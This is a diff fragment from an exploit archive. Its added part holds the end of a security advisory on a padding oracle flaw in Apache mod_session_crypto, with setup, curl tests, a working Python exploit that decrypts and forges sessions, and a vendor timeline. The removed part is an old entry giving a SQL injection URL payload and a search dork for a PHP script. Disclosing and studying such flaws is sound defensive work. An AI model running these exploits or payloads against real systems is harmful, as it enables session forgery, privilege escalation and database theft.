APR_SUCCESS if successful. + */ +static apr_status_t encrypt_string(request_rec * r, const apr_crypto_t *f, + session_crypto_dir_conf *dconf, const char *in, char **out) +{ +[...] + apr_crypto_key_t *key = NULL; +[...] + const unsigned char *iv = NULL; +[...] + + /* use a uuid as a salt value, and prepend it to our result */ + apr_uuid_get(&salt); + +[...] + + res = apr_crypto_passphrase(&key, &ivSize, passphrase, + strlen(passphrase), + (unsigned char *) (&salt), sizeof(apr_uuid_t), + *cipher, APR_MODE_CBC, 1, 4096, f, r->pool); + +[...] + + res = apr_crypto_block_encrypt_init(&block, &iv, key, &blockSize, r->pool); +[...] + res = apr_crypto_block_encrypt(&encrypt, &encryptlen, (unsigned char *)in, + strlen(in), block); +[...] + res = apr_crypto_block_encrypt_finish(encrypt + encryptlen, &tlen, block); +[...] + + /* prepend the salt and the iv to the result */ + combined = apr_palloc(r->pool, ivSize + encryptlen + sizeof(apr_uuid_t)); + memcpy(combined, &salt, sizeof(apr_uuid_t)); + memcpy(combined + sizeof(apr_uuid_t), iv, ivSize); + memcpy(combined + sizeof(apr_uuid_t) + ivSize, encrypt, encryptlen); + + /* base64 encode the result */ + base64 = apr_palloc(r->pool, apr_base64_encode_len(ivSize + encryptlen + + sizeof(apr_uuid_t) + 1) + * sizeof(char)); +[...] + return res; +} +------------------------------------------------------------------------ + +The source code shows that an encryption key is derived from the +configured password and a randomly chosen salt by calling the function +"apr_crypto_passphrase". This function internally uses PBKDF2 to derive +the key. The data is then encrypted and the salt and IV prepended to the +encrypted data. Before returning to the caller, the result is encoded as +base64. + +This procedure does not guarantee integrity of the ciphertext, so the +Apache module is unable to detect whether a session sent back to the +server has been tampered with. Depending on the application this often +means that attackers are able to exploit a Padding Oracle vulnerability. +This allows decrypting the session and encrypting arbitrary data chosen +by the attacker. + + +Proof of Concept +================ + +The vulnerability can be reproduced as follows. First, the modules +mod_session, mod_session_crypto and mod_session_cookie are enabled and +configured: + +------------------------------------------------------------------------ +Session On +SessionEnv On +SessionCookieName session path=/ +SessionHeader X-Replace-Session +SessionCryptoPassphrase RedTeam +------------------------------------------------------------------------ + +In addition, CGI scripts are enabled for a folder and the following CGI +script is saved as "status.rb" and is made available to clients: + +------------------------------------------------------------------------ +#!/usr/bin/env ruby + +require 'cgi' + +cgi = CGI.new +data = CGI.parse(ENV['HTTP_SESSION']) + +if data.has_key? 'username' + puts + puts "your username is %s" % data['username'] + exit +end + +puts "X-Replace-Session: username=guest×tamp=" + Time.now.strftime("%s") +puts +puts "not logged in" +------------------------------------------------------------------------ + +Once the CGI script is correctly set up, the command-line HTTP client curl +can be used to access it: + +------------------------------------------------------------------------ +$ curl -i http://127.0.0.1:8080/cgi-bin/status.rb +HTTP/1.1 200 OK +Date: Tue, 19 Jan 2016 13:23:19 GMT +Server: Apache/2.4.10 (Ubuntu) +Set-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ + l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/ +Cache-Control: no-cache +Set-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ + l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/ +Transfer-Encoding: chunked +Content-Type: application/x-ruby + +not logged in +------------------------------------------------------------------------ + +The example shows that a new encrypted cookie with the name "session" is +returned, and the response body contains the text "not logged in". +Calling the script again with the cookie just returned reveals that the +username in the session is set to "guest": + +------------------------------------------------------------------------ +$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\ +LQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= \ +http://127.0.0.1:8080/cgi-bin/status.rb + +your username is guest +------------------------------------------------------------------------ + +Sending a modified cookie ending in "u=" instead of "U=" will invalidate +the padding at the end of the ciphertext, so the session cannot be +decrypted correctly and is therefore not passed to the CGI script, which +returns the text "not logged in" again: + +------------------------------------------------------------------------ +$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\ +LQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRu= \ +http://127.0.0.1:8080/cgi-bin/status.rb + +not logged in +------------------------------------------------------------------------ + +This verifies the existence of the Padding Oracle vulnerability. The +Python library[1] python-paddingoracle was then used to implement +decrypting the session by exploiting the Padding Oracle vulnerability. + +exploit.py +------------------------------------------------------------------------ +''' + +from paddingoracle import BadPaddingException, PaddingOracle +from base64 import b64encode, b64decode +import requests + +class PadBuster(PaddingOracle): + def __init__(self, valid_cookie, **kwargs): + super(PadBuster, self).__init__(**kwargs) + self.wait = kwargs.get('wait', 2.0) + self.valid_cookie = valid_cookie + + def oracle(self, data, **kwargs): + v = b64encode(self.valid_cookie+data) + + response = requests.get('http://127.0.0.1:8080/cgi-bin/status.rb', + cookies=dict(session=v), stream=False, timeout=5, verify=False) + + if 'username' in response.content: + logging.debug('No padding exception raised on %r', v) + return + + raise BadPaddingException + +if __name__ == '__main__': + import logging + import sys + + if not sys.argv[2:]: + print 'Usage: [encrypt|decrypt] ' + sys.exit(1) + + logging.basicConfig(level=logging.WARN) + mode = sys.argv[1] + session = b64decode(sys.argv[2]) + padbuster = PadBuster(session) + + if mode == "decrypt": + cookie = padbuster.decrypt(session[32:], block_size=16, iv=session[16:32]) + print('Decrypted session:\n%r' % cookie) + elif mode == "encrypt": + key = session[0:16] + plaintext = sys.argv[3] + + s = padbuster.encrypt(plaintext, block_size=16) + + data = b64encode(key+s[0:len(s)-16]) + print('Encrypted session:\n%s' % data) + else: + print "invalid mode" + sys.exit(1) + +''' +------------------------------------------------------------------------ + +This Python script can then be used to decrypt the session: + +------------------------------------------------------------------------ +$ time python exploit.py decrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\ +Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= +Decrypted session: +b'username=guest&timestamp=1453282205\r\r\r\r\r\r\r\r\r\r\r\r\r' + +real 6m43.088s +user 0m15.464s +sys 0m0.976s +------------------------------------------------------------------------ + +In this sample application, the username and a timestamp are included in +the session data. The Python script can also be used to encrypt a new +session containing the username "admin": + +------------------------------------------------------------------------ +$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\ +Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\ +RU= username=admin + +Encrypted session: +sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY + +real3m38.002s +users0m8.536s +sys0m0.512s + +------------------------------------------------------------------------ + +Sending this newly encrypted session to the server shows that the +username is now "admin": + +------------------------------------------------------------------------ +$ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\ +zmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb + +your username is admin +------------------------------------------------------------------------ + + +Workaround +========== + +Use a different means to store the session, e.g. in a database by using +mod_session_dbd. + + +Fix +=== + +Update to Apache HTTP version 2.4.25 (see [2]). + + +Security Risk +============= + +Applications which use mod_session_crypto usually store sensitive values +in the session and rely on an attacker's inability to decrypt or modify +the session. Successful exploitation of the Padding Oracle vulnerability +subverts this mechanism and allows to construct sessions with arbitrary +attacker-specified content. Depending on the application this may +completely subvert the application's security. Therefore, this +vulnerability poses a high risk. + + +Timeline +======== + +2016-01-11 Vulnerability identified +2016-01-12 Customer approved disclosure to vendor +2016-01-12 CVE number requested +2016-01-20 Vendor notified +2016-01-22 Vendor confirmed the vulnerability +2016-02-03 Vendor provided patch +2016-02-04 Apache Security Team assigned CVE number +2016-03-03 Requested status update from vendor, no response +2016-05-02 Requested status update from vendor, no response +2016-07-14 Requested status update and roadmap from vendor +2016-07-21 Vendor confirms working on a new released and inquired whether the + patch fixes the vulnerability +2016-07-22 RedTeam confirms +2016-08-24 Requested status update from vendor +2016-08-29 Vendor states that there is no concrete timeline +2016-12-05 Vendor announces a release +2016-12-20 Vendor released fixed version +2016-12-23 Advisory released + + +References +========== + +[1] https://github.com/mwielgoszewski/python-paddingoracle +[2] http://httpd.apache.org/security/vulnerabilities_24.html + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ +''' \ No newline at end of file diff --git a/platforms/php/webapps/10834.txt b/platforms/php/webapps/10834.txt deleted file mode 100755 index 05b9a42d4..000000000 --- a/platforms/php/webapps/10834.txt +++ /dev/null @@ -1,28 +0,0 @@ -|___________________________________________________| -| -| Link Trader (lnkid) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : www.iq-ty.com<http://www.iq-ty.com> -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -|___________________________________________________ -| | -| -| script : http://www.ezonescripts.com/scripts/sls/linktrader.php -| -| DorK : inurl:ratelink.php?lnkid= -|___________________________________________________| - -Exploit: - - - -www.[target].com/Script/ratelink.php?lnkid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12+from+o_categories/* -